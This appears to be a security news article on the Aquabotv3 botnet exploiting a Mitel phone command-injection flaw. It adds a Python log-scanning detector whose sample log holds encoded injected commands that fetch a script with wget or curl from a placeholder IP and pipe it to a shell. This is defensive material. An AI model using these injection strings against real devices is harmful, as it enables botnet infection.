Mitel Phones Vulnerable to Mirai Aquabot Malware Exploits
A New Malware Threat: Aquabotv3 Exploits Mitel Phones
A variant of the Mirai-based malware Aquabotv3 is creating waves in the cybersecurity world, actively exploiting a vulnerability in Mitel SIP phones, according to Akamai's Security Intelligence and Response Team. This marks the third iteration of Aquabot, a malware built for orchestrating DDoS attacks. What sets this version apart is its ability to detect and respond to kill signals sent to infected devices, reporting back to its command-and-control (C2) server to maintain the botnet's operational health.
Understanding the Vulnerability: CVE-2024-41710
The primary exploit target, identified as CVE-2024-41710, affects Mitel 6800, 6900, and 6970 conference phones through firmware R6.4.0.HF1. It allows attackers with administrative access to execute arbitrary OS-level commands, often due to default credentials left unchanged by users. Despite Mitel patching the vulnerability in mid-2024, reports suggest widespread exploitation began ramping up in early 2025.
Malware Behavior and Capabilities
Aquabotv3 introduces innovative mechanisms, including:
- A 'kill signal' detection capability that flags and reports device tampering attempts to C2 servers.
- Multi-architecture support for x86 and ARM, enhancing its reach across diverse devices.
- Command injection methodologies exploiting default configurations, enabling unauthorized root-level control.
Akamai's honeypots detected the malware attempting to download and execute shell scripts, which subsequently install malware onto target devices.
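The dropper behaviour described above (a command-injection request that fetches a shell script and pipes it to an interpreter) leaves a recognisable trace in a phone's web-server access log. The following is an added example, not code from Akamai's report or from Mitel: it parses constructed log lines, URL-decodes the request target, and flags requests that combine shell metacharacters with a download-and-execute pattern; the `/cgi-bin/example_admin` path and the addresses are placeholders, not the real Mitel endpoint.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (common log format); not real Mitel or Akamai data.
SAMPLE_LOG = """\
192.0.2.10 - admin [27/Jan/2025:10:14:02 +0000] "POST /cgi-bin/example_admin HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - admin [27/Jan/2025:10:14:07 +0000] "POST /cgi-bin/example_admin?opt=%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx.sh%20-O%20-%7Csh HTTP/1.1" 200 0 "-" "-"
192.0.2.44 - - [27/Jan/2025:10:15:30 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.10 - admin [27/Jan/2025:10:16:11 +0000] "POST /cgi-bin/example_admin?opt=%60curl%20198.51.100.7%2Fa.sh%7Cbash%60 HTTP/1.1" 500 0 "-" "-"
"""

# Common log format: client, ident, authenticated user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that separate an injected command from the expected value.
SHELL_META = re.compile(r'[;|`&]|\$\(')
# Download tool followed, somewhere later in the same value, by a shell interpreter.
DROPPER = re.compile(r'\b(?:wget|curl|tftp)\b.*\b(?:sh|bash)\b', re.IGNORECASE)


def find_dropper_attempts(log_text):
    """Return one record per request whose decoded target looks like a
    command-injection dropper (fetch a script, pipe it to a shell)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode twice so a double-encoded payload is still inspected in clear.
        target = unquote(unquote(m.group("target")))
        if SHELL_META.search(target) and DROPPER.search(target):
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                # A non-"-" user means the request was authenticated; with this
                # bug that usually points at unchanged default admin credentials.
                "user": m.group("user"),
                "status": int(m.group("status")),
                "decoded": target,
            })
    return hits


if __name__ == "__main__":
    for hit in find_dropper_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} user={hit['user']} status={hit['status']}: {hit['decoded']}")
```

A 200 on such a request means the injected command most likely ran; a 500 is still worth investigating, since the credentials used were valid either way.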
Expanding the Botnet Beyond Mitel Devices
The exploitation isn't limited to Mitel hardware. Aquabotv3 reportedly also exploits vulnerabilities in other widely deployed platforms, including Hadoop YARN and Linksys routers, as well as CVE-2018-10562 and CVE-2018-17532. These exploits highlight the malware's ability to adapt and scale across interconnected systems with differing weaknesses.
Mitigation Strategies for Businesses
To protect your organization:
- Update affected devices with the latest patches from manufacturers.
- Change default device credentials to strong, unique passwords.
- Implement network segmentation to limit the spread of malware.
- Monitor inbound and outbound traffic for unusual patterns typical of DDoS activities.
The Wider Implications
The rise of Aquabotv3 underscores the persistent threats posed by botnets and the vulnerabilities inherent in IoT and connected devices. Organizations must prioritize cybersecurity hygiene, including adherence to patch management protocols and proactive threat hunting.
As botnets grow more sophisticated, they're moving beyond simple attacks, posing operational and reputational risks for businesses and public systems alike. Akamai's analysis suggests a future in which such malware may feature even more complex and adaptive capabilities.